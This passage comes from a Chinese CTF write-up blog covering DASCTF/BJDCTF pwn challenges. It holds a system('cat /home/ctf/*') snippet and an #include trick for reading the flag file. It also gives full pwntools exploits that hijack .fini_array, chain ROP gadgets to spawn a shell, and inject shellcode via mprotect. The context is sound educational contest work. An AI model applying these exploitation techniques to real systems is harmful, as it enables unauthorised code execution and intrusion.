<span class="token keyword">int</span> <span class="token function">main</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
<span class="token punctuation">{</span>
    <span class="token keyword">char</span> rce<span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token operator">=</span><span class="token string">"cat /home/ctf/*"</span><span class="token punctuation">;</span>    
    <span class="token function">system</span><span class="token punctuation">(</span>rce<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span></code></pre>
<p>一开始我是用oj0的exp的字节码输入的，但太长了，就换了个这个，不过也报错了，预期解是啥我不知道，这题最终解决还是非预期解，直接</p>
<pre class=" language-c"><code class="language-c"><span class="token macro property">#<span class="token directive keyword">include</span> <span class="token string">"/home/ctf/flag"</span></span></code></pre>
<p>即可</p>
<p>👴裂开来</p>
<p>以上就是我做出来的四道题，下面四道就是复现了</p>
<h2 id="0x5-Memory-Monster-II"><a href="#0x5-Memory-Monster-II" class="headerlink" title="0x5.Memory_Monster_II"></a>0x5.Memory_Monster_II</h2><p>这题静态编译，后门函数就是钓鱼(/bin/fish)，做的时候毫无头绪，遂谷歌一波，找到了这位师傅的<a href="https://xuanxuanblingbling.github.io/ctf/pwn/2019/09/06/317/" target="_blank" rel="noopener">博客</a>,不过看到有栈迁移就没看了，因为这题有个canary检查嘛。。。赛后看师傅们的wp，发现这一篇博文记录的知识点和题目考察的知识点一样的，就是劫持fini_array，真想给自己来一大嘴巴子。。。。</p>
<p>由于程序是静态编译，所以函数名杂乱无章，不过IDA能够识别出start函数，start函数里面会调用__libc_start_main，函数原型如下</p>
<pre class=" language-c"><code class="language-c"><span class="token function">__libc_start_main</span><span class="token punctuation">(</span>main<span class="token punctuation">,</span>argc<span class="token punctuation">,</span>argv<span class="token operator">&amp;</span>env<span class="token punctuation">,</span>init<span class="token punctuation">,</span>fini<span class="token punctuation">,</span>rtld_fini<span class="token punctuation">)</span></code></pre>
<p>我们对照着看Memory_Monster_I和Memory_Monster_II的start函数</p>
<p><img src="/LawlietLW.github.io/2020/05/24/dasctf-wu-yue-sai-bjdctf/1.jpg" alt=""></p>
<p><img src="/LawlietLW.github.io/2020/05/24/dasctf-wu-yue-sai-bjdctf/2.jpg" alt=""></p>
<p>很容易通过对比确定函数</p>
<p>然后我们还需要一切前置知识，Linux下c程序是如何运行的，大致流程如下</p>
<pre><code>_start---&gt;__libc_start_main_---&gt;init---&gt;main---&gt;fini</code></pre><p>init和fini中分别存在数组.init_array和.fini_arry，这两个数组中存储着init函数和fini函数要执行的函数地址，可以通过ctrl+s在IDA中查看这两个数组的地址</p>
<p><img src="/LawlietLW.github.io/2020/05/24/dasctf-wu-yue-sai-bjdctf/3.jpg" alt=""></p>
<p>我们在gdb中查看一下具体内容</p>
<p><img src="/LawlietLW.github.io/2020/05/24/dasctf-wu-yue-sai-bjdctf/4.jpg" alt=""></p>
<p>可以看到，.init_array和.fini_array中都存储着两个地址</p>
<p>上面的程序执行流程，更细化一点如下</p>
<pre><code>_start---&gt;__libc_start_main---&gt;init---&gt;.init_array[0]---&gt;.init_array[1]---&gt;...---&gt;.init_array[n]---&gt;main---&gt;fini---&gt;.fini_array[n]---&gt;.fini_array[n-1]---&gt;...---&gt;.fini_array[0]</code></pre><p>init函数为执行main函数做准备，fini函数为main函数收尾，且init的执行顺序是顺序执行，fini则是逆序执行</p>
<p>此题中.init_array和.fini_array都有两个值，所以当我们将.fini_array[1]修改为main函数的地址，将.fini_array[0]修改为fini函数的地址，就可以无限循环了，流程如下</p>
<pre><code>_start---&gt;__libc_start_main---&gt;init---&gt;.init_array[0]---&gt;.init_array[1]---&gt;main---&gt;fini---&gt;.fini_array[1](main)---&gt;.fini_array[0](fini)</code></pre><p>所以这题的思路就是，首先修改.fini_array[1]为main函数的地址，.fini_array[0]修改为fini函数的地址，然后往.fini_array[2]上写rop链，rop链构造好后，再将.fini_array[0]修改为leave_ret,.fini_array[1]修改为ret即可执行rop链，这里其实就是一个栈迁移，具体原因看上面那个链接</p>
<p>exp如下</p>
<pre class=" language-python"><code class="language-python"><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span>
io <span class="token operator">=</span> process<span class="token punctuation">(</span><span class="token string">'./Memory_Monster_II'</span><span class="token punctuation">)</span>
elf <span class="token operator">=</span> ELF<span class="token punctuation">(</span><span class="token string">'Memory_Monster_II'</span><span class="token punctuation">)</span>


<span class="token keyword">def</span> <span class="token function">write</span><span class="token punctuation">(</span>target<span class="token punctuation">,</span> data<span class="token punctuation">)</span><span class="token punctuation">:</span>
    io<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'addr:'</span><span class="token punctuation">)</span>
    io<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>target<span class="token punctuation">)</span>
    io<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'data:'</span><span class="token punctuation">)</span>
    io<span class="token punctuation">.</span>send<span class="token punctuation">(</span>data<span class="token punctuation">)</span>


fini_array <span class="token operator">=</span> <span class="token number">0x4b80b0</span>
main <span class="token operator">=</span> <span class="token number">0x401c1d</span>
fini <span class="token operator">=</span> <span class="token number">0x402cb0</span>
pop_rdi_ret <span class="token operator">=</span> <span class="token number">0x0000000000401746</span>
pop_rsi_ret <span class="token operator">=</span> <span class="token number">0x0000000000406f80</span>
pop_rdx_ret <span class="token operator">=</span> <span class="token number">0x0000000000448415</span>
pop_rax_ret <span class="token operator">=</span> <span class="token number">0x0000000000448fcc</span>
bin_sh_addr <span class="token operator">=</span> <span class="token number">0x0000000000492895</span>
leave_ret <span class="token operator">=</span> <span class="token number">0x0000000000401cf3</span>
syscall <span class="token operator">=</span> <span class="token number">0x0000000000402514</span>
ret <span class="token operator">=</span> <span class="token number">0x0000000000401016</span>

write<span class="token punctuation">(</span>p64<span class="token punctuation">(</span>fini_array<span class="token punctuation">)</span><span class="token punctuation">,</span> p64<span class="token punctuation">(</span>fini<span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>main<span class="token punctuation">)</span><span class="token punctuation">)</span>
write<span class="token punctuation">(</span>p64<span class="token punctuation">(</span>fini_array<span class="token operator">+</span><span class="token number">0x10</span><span class="token punctuation">)</span><span class="token punctuation">,</span> p64<span class="token punctuation">(</span>pop_rdi_ret<span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>bin_sh_addr<span class="token punctuation">)</span><span class="token punctuation">)</span>
write<span class="token punctuation">(</span>p64<span class="token punctuation">(</span>fini_array<span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token punctuation">)</span><span class="token punctuation">,</span> p64<span class="token punctuation">(</span>pop_rsi_ret<span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
write<span class="token punctuation">(</span>p64<span class="token punctuation">(</span>fini_array<span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token punctuation">)</span><span class="token punctuation">,</span> p64<span class="token punctuation">(</span>pop_rdx_ret<span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
write<span class="token punctuation">(</span>p64<span class="token punctuation">(</span>fini_array<span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token punctuation">)</span><span class="token punctuation">,</span> p64<span class="token punctuation">(</span>pop_rax_ret<span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span><span class="token number">59</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
write<span class="token punctuation">(</span>p64<span class="token punctuation">(</span>fini_array<span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token punctuation">)</span><span class="token punctuation">,</span> p64<span class="token punctuation">(</span>syscall<span class="token punctuation">)</span><span class="token punctuation">)</span>
write<span class="token punctuation">(</span>p64<span class="token punctuation">(</span>fini_array<span class="token punctuation">)</span><span class="token punctuation">,</span> p64<span class="token punctuation">(</span>leave_ret<span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>ret<span class="token punctuation">)</span><span class="token punctuation">)</span>

io<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span>
</code></pre>
<p>呜呼呼，这题涨姿势了，学到了新知识点</p>
<h2 id="0x6-Memory-Monster-III"><a href="#0x6-Memory-Monster-III" class="headerlink" title="0x6.Memory Monster III"></a>0x6.Memory Monster III</h2><p>思路可上一题大致相同，不过要利用mprotect修改内存段权限，然后写入shellcode执行</p>
<pre class=" language-python"><code class="language-python"><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span>
context<span class="token punctuation">.</span>log_level <span class="token operator">=</span> <span class="token string">'debug'</span>
context<span class="token punctuation">.</span>binary <span class="token operator">=</span> <span class="token string">'./Memory_Monster_III'</span>
io <span class="token operator">=</span> process<span class="token punctuation">(</span><span class="token string">'./Memory_Monster_III'</span><span class="token punctuation">)</span>
elf <span class="token operator">=</span> ELF<span class="token punctuation">(</span><span class="token string">'Memory_Monster_III'</span><span class="token punctuation">)</span>


<span class="token keyword">def</span> <span class="token function">write</span><span class="token punctuation">(</span>target<span class="token punctuation">,</span> data<span class="token punctuation">)</span><span class="token punctuation">:</span>
    io<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'addr:'</span><span class="token punctuation">)</span>
    io<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>target<span class="token punctuation">)</span>
    io<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'data:'</span><span class="token punctuation">)</span>
    io<span class="token punctuation">.</span>send<span class="token punctuation">(</span>data<span class="token punctuation">)</span>


fini_array <span class="token operator">=</span> <span class="token number">0x4b50b0</span>
main <span class="token operator">=</span> <span class="token number">0x401c1d</span>
fini <span class="token operator">=</span> <span class="token number">0x402ca0</span>
mprotect <span class="token operator">=</span> <span class="token number">0x448420</span>
buf <span class="token operator">=</span> <span class="token number">0x4bc100</span>
read <span class="token operator">=</span> <span class="token number">0x447620</span>
pop_rdi_ret <span class="token operator">=</span> <span class="token number">0x0000000000401746</span>
pop_rsi_ret <span class="token operator">=</span> <span class="token number">0x0000000000406f70</span>
pop_rdx_ret <span class="token operator">=</span> <span class="token number">0x0000000000447635</span>
leave_ret <span class="token operator">=</span> <span class="token number">0x0000000000401cf3</span>
ret <span class="token operator">=</span> <span class="token number">0x0000000000401016</span>

write<span class="token punctuation">(</span>p64<span class="token punctuation">(</span>fini_array<span class="token punctuation">)</span><span class="token punctuation">,</span> p64<span class="token punctuation">(</span>fini<span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>main<span class="token punctuation">)</span><span class="token punctuation">)</span>
write<span class="token punctuation">(</span>p64<span class="token punctuation">(</span>fini_array<span class="token operator">+</span><span class="token number">0x10</span><span class="token punctuation">)</span><span class="token punctuation">,</span> p64<span class="token punctuation">(</span>pop_rdi_ret<span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
write<span class="token punctuation">(</span>p64<span class="token punctuation">(</span>fini_array<span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token punctuation">)</span><span class="token punctuation">,</span> p64<span class="token punctuation">(</span>pop_rsi_ret<span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>buf<span class="token punctuation">)</span><span class="token punctuation">)</span>
write<span class="token punctuation">(</span>p64<span class="token punctuation">(</span>fini_array<span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token punctuation">)</span><span class="token punctuation">,</span> p64<span class="token punctuation">(</span>pop_rdx_ret<span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span><span class="token number">0x200</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
write<span class="token punctuation">(</span>p64<span class="token punctuation">(</span>fini_array<span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token punctuation">)</span><span class="token punctuation">,</span> p64<span class="token punctuation">(</span>read<span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>pop_rdi_ret<span class="token punctuation">)</span><span class="token punctuation">)</span>
write<span class="token punctuation">(</span>p64<span class="token punctuation">(</span>fini_array<span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token punctuation">)</span><span class="token punctuation">,</span> p64<span class="token punctuation">(</span>buf<span class="token number">-0x100</span><span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>pop_rsi_ret<span class="token punctuation">)</span><span class="token punctuation">)</span>
write<span class="token punctuation">(</span>p64<span class="token punctuation">(</span>fini_array<span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token punctuation">)</span><span class="token punctuation">,</span> p64<span class="token punctuation">(</span><span class="token number">1000</span><span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>pop_rdx_ret<span class="token punctuation">)</span><span class="token punctuation">)</span>
write<span class="token punctuation">(</span>p64<span class="token punctuation">(</span>fini_array<span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token punctuation">)</span><span class="token punctuation">,</span> p64<span class="token punctuation">(</span><span class="token number">7</span><span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>mprotect<span class="token punctuation">)</span><span class="token punctuation">)</span>
write<span class="token punctuation">(</span>p64<span class="token punctuation">(</span>fini_array<span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token operator">+</span><span class="token number">0x10</span><span class="token punctuation">)</span><span class="token punctuation">,</span> p64<span class="token punctuation">(</span>buf<span class="token punctuation">)</span><span class="token punctuation">)</span>
write<span class="token punctuation">(</span>p64<span class="token punctuation">(</span>fini_array<span class="token punctuation">)</span><span class="token punctuation">,</span> p64<span class="token punctuation">(</span>leave_ret<span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>ret<span class="token punctuation">)</span><span class="token punctuation">)</span>
shellcode <span class="token operator">=</span> asm<span class="token punctuation">(</span>shellcraft<span class="token punctuation">.</span>sh<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
io<span class="token punctuation">.</span>send<span class="token punctuation">(</span>shellcode<span class="token punctuation">)</span>
io<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span>
</code></pre>
<script>
        document.querySelectorAll('.github-emoji')
          .forEach(el => {
            if (!el.dataset.src) { return; }
            const img = document.createElement('img');
            img.style = 'display:none !important;';
            img.src = el.dataset.src;
            img.addEventListener('error', () => {
              img.remove();
              el.style.color = 'inherit';
              el.style.backgroundImage = 'none';
              el.style.background = 'none';
            });
            img.addEventListener('load', () => {
              img.remove();
            });
            document.body.appendChild(img);
          });
      </script>

			
            <section class="comment">
<!-- 多说评论框 start -->
	<div class="ds-thread" data-thread-key="/LawlietLW.github.io/2020/05/24/dasctf-wu-yue-sai-bjdctf/" data-title="DASCTF五月赛&amp;BJDCTF" data-url="http://LawlietLW.github.io/LawlietLW.github.io/2020/05/24/dasctf-wu-yue-sai-bjdctf/"></div>
<!-- 多说评论框 end -->
<!-- 多说公共JS代码 start (一个网页只需插入一次) -->
<script type="text/javascript">
var duoshuoQuery = {short_name:"YOUR_DUOSHUO_SHORT_NAME"};
	(function() {
		var ds = document.createElement('script');
		ds.type = 'text/javascript';ds.async = true;
		ds.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js';
		ds.charset = 'UTF-8';
		(document.getElementsByTagName('head')[0]
		 || document.getElementsByTagName('body')[0]).appendChild(ds);
	})();
	</script>
<!-- 多说公共JS代码 end -->
</section>
        </div>
    </div>
</article>

    <footer id="footer">
    <div id="bottom-tip">
        Lock&#39;s blog
    </div>
        <small>该博客由 <a href="https://hexo.io/" target="_blank">Hexo</a> 强力驱动，搭载 <a href="https://github.com/XadillaX/hexadillax" target="_blank">Hexadillax</a> 主题</small><br />
        <small>&copy; 2014 Lock</small>
    </footer>

    


</body>
</html>

